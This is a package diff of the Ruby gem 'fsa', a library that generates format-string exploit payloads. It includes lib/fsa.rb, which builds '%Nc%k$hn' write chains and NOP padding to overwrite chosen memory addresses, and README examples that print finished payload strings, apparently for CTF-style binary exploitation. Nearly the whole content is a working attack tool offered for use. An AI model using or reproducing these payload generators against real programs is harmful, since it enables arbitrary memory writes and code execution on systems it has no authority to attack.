fsa 0.1.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 9a2e91df49fc153348331c23ae87e999449c404f612f68e2275a72edd208179f
+  data.tar.gz: e8970243f8068b68078ec5901fe972a2cd13f09c4eff799b0f20490ff8e74d87
+SHA512:
+  metadata.gz: bc431edf36041a285638650bae2650759c24d975228ec1817c916250d5fecaf501026dda67958956c24683b6de63d93ad8a99180997c75c427b2a570c7b5439b
+  data.tar.gz: 735b5fe6a69fd26e7c83f98703dbf5e2ff3119dec5ec0ca5781bee213c92aef18111fc177a24bd46111f4319b00d71370bb85c1730f7e27dd9b5f1c7424dff82

data/.gitignore

@@ -0,0 +1,8 @@
+/.bundle/
+/.yardoc
+/_yardoc/
+/coverage/
+/doc/
+/pkg/
+/spec/reports/
+/tmp/

data/Gemfile

@@ -0,0 +1,6 @@
+source "https://rubygems.org"
+
+git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
+
+# Specify your gem's dependencies in fsa.gemspec
+gemspec

data/Gemfile.lock

@@ -0,0 +1,20 @@
+PATH
+  remote: .
+  specs:
+    fsa (0.1.0)
+
+GEM
+  remote: https://rubygems.org/
+  specs:
+    rake (10.5.0)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  bundler (~> 1.16)
+  fsa!
+  rake (~> 10.0)
+
+BUNDLED WITH
+   1.16.1

data/LICENSE.txt

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2018 Chihiro Hasegawa
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.

data/README.md

@@ -0,0 +1,52 @@
+# fsalib
+
+[![Build Status](https://travis-ci.org/owlinux1000/fsalib.svg?branch=master)](https://travis-ci.org/owlinux1000/fsalib)
+[![MIT License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat)](LICENSE)
+
+I made this script based on [libformatstr](https://github.com/hellman/libformatstr).
+
+## Usage
+
+### Basic
+
+```ruby
+#coding: ascii-8bit
+require_relative 'fsalib'
+
+target_addr = 0x08049580
+
+value = 0xdeadbeef
+fmt = FSA.new()
+fmt[target_addr] = value
+p fmt.payload(0) # index of argument
+#=> "%48879c%6$hn%8126c%7$hnA\x80\x95\x04\b\x82\x95\x04\b"
+
+# Supported Array
+value = [0xdeadbeef, 0xdeadbeef] # like ropchain
+fmt = FSA.new()
+fmt[target_addr] = value
+p fmt.payload(0)
+#=> "%48879c%9$hn%10$hn%8126c%11$hn%12$hn\x80\x95\x04\b\x84\x95\x04\b\x82\x95\x04\b\x86\x95\x04\b"
+
+# Supported String
+value = "H@CK"
+fmt = FSA.new()
+fmt[target] = value
+p fmt.payload(0)
+#=> "%16456c%6$hn%2811c%7$hnA\x80\x95\x04\b\x82\x95\x04\b"
+```
+
+### Advanced
+
+```ruby
+#coding: ascii-8bit
+require_relative 'fsalib'
+
+target_addr = 0x08049580
+value = 0xdead            # 2byte(Supported 2byte, 1byte)
+fmt = FSA.new(30)         # padding 
+fmt[target_addr] = value
+p fmt.payload(0, start_len = 10) # len of already printed data
+#=> "%57005c%3$hnAAL\xA0\x04\b\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+
+```

data/Rakefile

@@ -0,0 +1,2 @@
+require "bundler/gem_tasks"
+task :default => :spec

data/bin/console

@@ -0,0 +1,14 @@
+#!/usr/bin/env ruby
+
+require "bundler/setup"
+require "fsa"
+
+# You can add fixtures and/or initialization code here to make experimenting
+# with your gem easier. You can also use a different console, if you like.
+
+# (If you use this, don't forget to add pry to your Gemfile!)
+# require "pry"
+# Pry.start
+
+require "irb"
+IRB.start(__FILE__)

data/bin/setup

@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+set -euo pipefail
+IFS=$'\n\t'
+set -vx
+
+bundle install
+
+# Do any other automated setup that you need to do here

data/fsa.gemspec

@@ -0,0 +1,25 @@
+
+lib = File.expand_path("../lib", __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require "fsa/version"
+
+Gem::Specification.new do |spec|
+  spec.name          = "fsa"
+  spec.version       = Fsa::VERSION
+  spec.authors       = ["Chihiro Hasegawa"]
+  spec.email         = ["register.chihiro@gmail.com"]
+
+  spec.summary       = %q{Generating payload of format string bug}
+  spec.description   = %q{Generating payload of format string bug}
+  spec.license       = "MIT"
+  spec.homepage      = "https://github.com/owlinux1000/fsa"
+  spec.files         = `git ls-files -z`.split("\x0").reject do |f|
+    f.match(%r{^(test|spec|features)/})
+  end
+  spec.bindir        = "exe"
+  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+  spec.require_paths = ["lib"]
+
+  spec.add_development_dependency "bundler", "~> 1.16"
+  spec.add_development_dependency "rake", "~> 10.0"
+end

data/lib/fsa/version.rb

@@ -0,0 +1,3 @@
+module Fsa
+  VERSION = "0.1.0"
+end

data/lib/fsa.rb

@@ -0,0 +1,208 @@
+#coding: ascii-8bit
+require "fsa/version"
+
+class FSA
+  
+  def initialize(buffer_size = 0)
+    @mem = {}
+    @buffer_size = buffer_size
+  end
+
+  def []=(addr, value)
+    
+    if addr.class <= Integer
+      addr = addr % 4294967296
+    else
+      raise TypeError, "Address must be Integer"
+    end
+
+    value_class = value.class
+    
+    case
+    when value_class == Array
+      value.each do |v|
+        addr = self.[]=(addr, v)
+      end
+      return addr
+      
+    when value_class == String
+      value.bytes.each_with_index do |v, i|
+        @mem[addr + i] = v
+      end
+      return addr + value.length
+      
+    else
+
+      bit_length = value.bit_length
+      
+      case
+      when bit_length <= 8
+        @mem[addr] = value
+        return addr + 1
+        
+      when bit_length <= 16
+        2.times do |i|
+          @mem[addr + i] = (value.to_i >> (i * 8)) % 256
+        end
+        return addr + 2
+        
+      when bit_length <= 32
+        4.times do |i|
+          @mem[addr + i] = (value.to_i >> (i * 8)) % 256
+        end
+        return addr + 4
+        
+      end
+    end
+  end
+
+  def [](addr)
+    @mem[addr]
+  end
+
+  def payload(arg_index, padding = 0, start_len = 0)
+    raise TypeError, "Index must be Integer" unless arg_index.class <= Integer
+    raise TypeError, "Padding must be Integer" unless padding.class <= Integer
+    raise TypeError, "Start_len must be Integer" unless start_len.class <= Integer
+    gen = PayloadGenerator.new(@mem, @buffer_size)
+    gen.payload(arg_index, padding, start_len)
+  end
+
+  def self.s(addr, arg_index)
+    if addr.class <= Integer
+      addr = addr % 4294967296
+    else
+      raise TypeError, "Address must be Integer"
+    end
+    if arg_index.class <= Integer
+      arg_index = arg_index % 4294967296
+    else
+      raise TypeError, "Address must be Integer"
+    end
+    [addr].pack("L") + "%#{arg_index}$s"
+  end
+end
+
+class PayloadGenerator
+  
+  def initialize(mem, buffer_size)
+
+    @mem = mem
+    @buffer_size = buffer_size
+    @tuples = []
+    @addrs  = mem.keys
+
+    addr_index = 0
+    while addr_index < @addrs.size
+      
+      addr = @addrs[addr_index]
+      
+      dword = 0
+      4.times do |i|
+        unless @mem.key?(addr + i)
+          dword = -1
+          break
+        end
+        dword |= @mem[addr + i] << (i * 8)
+      end
+      if 0 <= dword && dword < 65536
+        @tuples << [addr, 4, dword]
+      
+        if @addrs[addr_index + 2] == addr + 3
+          addr_index += 3
+        elsif @addrs[addr_index + 3] == addr + 3
+          addr_index += 4
+        else
+          raise "Unknown error. Missing bytes"
+        end
+      end
+      
+      word = 0
+      2.times do |i|
+        unless @mem.key?(addr + i)
+          word = -1
+          break
+        end
+        word |= @mem[addr + i] << (i * 8)
+      end
+
+      
+      if 0 <= word && word < 65536
+        @tuples << [addr, 2, word]
+        if @addrs[addr_index] == addr + 1
+          addr_index += 1
+        elsif @addrs[addr_index + 1] == addr + 1
+          addr_index += 2
+        else
+          raise "Unknown error. Missing bytes"
+        end
+        next
+      else
+        if (addr_index > 0) && (@addrs[addr_index - 1] > @addrs[addr_index] - 1)
+          addr_index -= 1
+        else
+          @tuples << [addr, 1, @mem[addr]]
+          addr_index += 1
+        end
+      end
+    end
+    @tuples.sort_by!(&:last).reverse
+  end
+  
+  def payload(arg_index, padding = 0, start_len = 0)
+    
+    prev_len = -1
+    prev_pay = ""
+    index = arg_index * 10000
+    @payload = ""
+    
+    loop do
+      
+      @payload = ""
+      
+      addrs   = ""
+      printed = start_len
+      
+      @tuples.each do |addr, size, value|
+        
+        print_len = value - printed
+        
+        if print_len > 2
+          @payload += "%" + print_len.to_s + "c"
+        elsif print_len >= 0
+          @payload += "A" * print_len
+        else
+          puts "Can\'t write a value %08x (too small)." % value
+          next
+        end
+        
+        modi = {
+         1 => "hh",
+         2 => "h",
+         4 =>  ""
+        }[size]
+        
+        @payload += "%" + index.to_s + "$" + modi + "n"
+        addrs += [addr].pack("L")
+        printed += print_len
+        index += 1
+      end
+      
+      @payload += "A" * ((padding - @payload.length) % 4)
+      
+      if @payload.length == prev_len
+        @payload += addrs
+        break
+      end
+      
+      prev_len = @payload.length
+      prev_pay = @payload
+      index    = arg_index + @payload.length / 4
+      
+    end
+    
+    puts "Payload contains NULL bytes." if @payload.include?("\x00")
+    @payload.ljust(@buffer_size, "\x90")
+  end
+end
+

metadata

@@ -0,0 +1,84 @@
+--- !ruby/object:Gem::Specification
+name: fsa
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- Chihiro Hasegawa
+autorequire: 
+bindir: exe
+cert_chain: []
+date: 2018-05-01 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.16'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.16'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+description: Generating payload of format string bug
+email:
+- register.chihiro@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- Gemfile
+- Gemfile.lock
+- LICENSE.txt
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- fsa.gemspec
+- lib/fsa.rb
+- lib/fsa/version.rb
+- vendor/cache/rake-10.5.0.gem
+homepage: https://github.com/owlinux1000/fsa
+licenses:
+- MIT
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.7.3
+signing_key: 
+specification_version: 4
+summary: Generating payload of format string bug
+test_files: []